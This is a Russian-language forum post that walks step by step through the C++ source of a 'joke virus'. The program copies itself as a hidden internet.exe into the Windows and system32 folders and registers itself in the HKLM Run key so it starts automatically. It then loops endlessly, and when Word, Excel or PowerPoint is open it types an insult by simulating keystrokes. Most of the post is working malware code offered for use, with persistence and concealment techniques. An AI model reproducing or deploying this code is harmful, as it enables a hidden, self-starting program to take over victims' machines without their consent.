Исходник вируса на C++. Шутка с MS Word.

  • Автор темы Error404
  • 427
  • Обновлено
  • 11, Apr 2013
  • #1
Еще один исходник вируса на C++. Шутка с MS Word. Сейчас по шагам распишем, как устроен этот шутник.

Подключаем библиотеки и создаем основные переменные.

 [INDENT][COLOR=#ffffff][B]#include <windows.h>
#include <iostream.h>[/B]
[B]WINAPI WinMain(HINSTANCE hint, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{[/B]
[B]HKEY key;
char sysdir[256],
windir[256],
myname[256];[/B]
[/COLOR][/INDENT]
Узнаем свое имя функцией GetModuleFileName. И узнает адрес папки windows и папки system32 функциями GetWindowsDirectory и GetSystemDirectory

 [INDENT][COLOR=#ffffff][B]GetModuleFileName(hint,myname,256);
GetWindowsDirectory(windir,sizeof(windir));
GetSystemDirectory(sysdir,sizeof(sysdir));[/B]
[/COLOR][/INDENT]
Добавляем к строкам содержащим пути к системным папкам имя нашего вируса, чтобы скопировать в эти папки себя.

 [INDENT][COLOR=#ffffff][B]strcat(windir,"\\internet.exe");
strcat(sysdir,"\\internet.exe");[/B]
[/COLOR][/INDENT]
Копируемся и ставим себе скрытые атрибуты

 [INDENT][COLOR=#ffffff][B]CopyFile(myname,windir,FALSE);
CopyFile(myname,sysdir,FALSE);
SetFileAttributes(windir,FILE_ATTRIBUTE_HIDDEN);
SetFileAttributes(sysdir,FILE_ATTRIBUTE_HIDDEN);[/B]
[/COLOR][/INDENT]
Прописываемся в реестр на автозагрузку

 [INDENT][COLOR=#ffffff][B]RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0,KEY_WRITE, &key);
RegSetValueEx(key,"internet.exe",0,REG_SZ,(BYTE *)sysdir,256);
RegCloseKey(key);[/B]
[/COLOR][/INDENT]
Ожидаем 2 минуты. Зачем не знаю



Скрытая информация :: Авторизуйтесь для просмотра »
Запускаем бесконечный цикл каждые 10 секунд. В цикле ищем окна содержащие в своих заголовках Microsoft Word, Microsoft Excel,Microsoft PowerPoint. Максимизируем окно, переключаем раскладку клавиатуры на русскую и эмулируем нажатие на несколько клавиш. В результате в окне пользователя в WORD сам по себе печатается текст "Вы ламер".

 [INDENT][COLOR=#ffffff][B]int k=0;

do

{

if (FindWindow(NULL, "Microsoft Word")!=0 || FindWindow(NULL, "Microsoft Excel")!=0 || FindWindow(NULL, "Microsoft PowerPoint")!=0)

{

ShowWindow(FindWindow(NULL, "Microsoft Word") , SC_MAXIMIZE);

LoadKeyboardLayout("00000419", KLF_ACTIVATE);

Sleep(10000);

do

{

keybd_event('D', 0,0,0);

keybd_event('D', 0,KEYEVENTF_KEYUP,0);

keybd_event('S', 0,0,0);

keybd_event('S', 0,KEYEVENTF_KEYUP,0);

keybd_event(VK_SPACE, 0,0,0);

keybd_event(VK_SPACE, 0,KEYEVENTF_KEYUP,0);

keybd_event('K', 0,0,0);

keybd_event('K', 0,KEYEVENTF_KEYUP,0);

keybd_event('F', 0,0,0);

keybd_event('F', 0,KEYEVENTF_KEYUP,0);

keybd_event('V', 0,0,0);

keybd_event('V', 0,KEYEVENTF_KEYUP,0);

keybd_event('T', 0,0,0);

keybd_event('T', 0,KEYEVENTF_KEYUP,0);

keybd_event('H', 0,0,0);

keybd_event('H', 0,KEYEVENTF_KEYUP,0);

}while(1);

}

}while(1);

}[/B]

[/COLOR][/INDENT]

Вот и весь вирус-шутник.

Error404


Рег
16 Nov, 2004

Тем
563

Постов
803

Баллов
6433
Тем
49554
Комментарии
57426
Опыт
552966

Интересно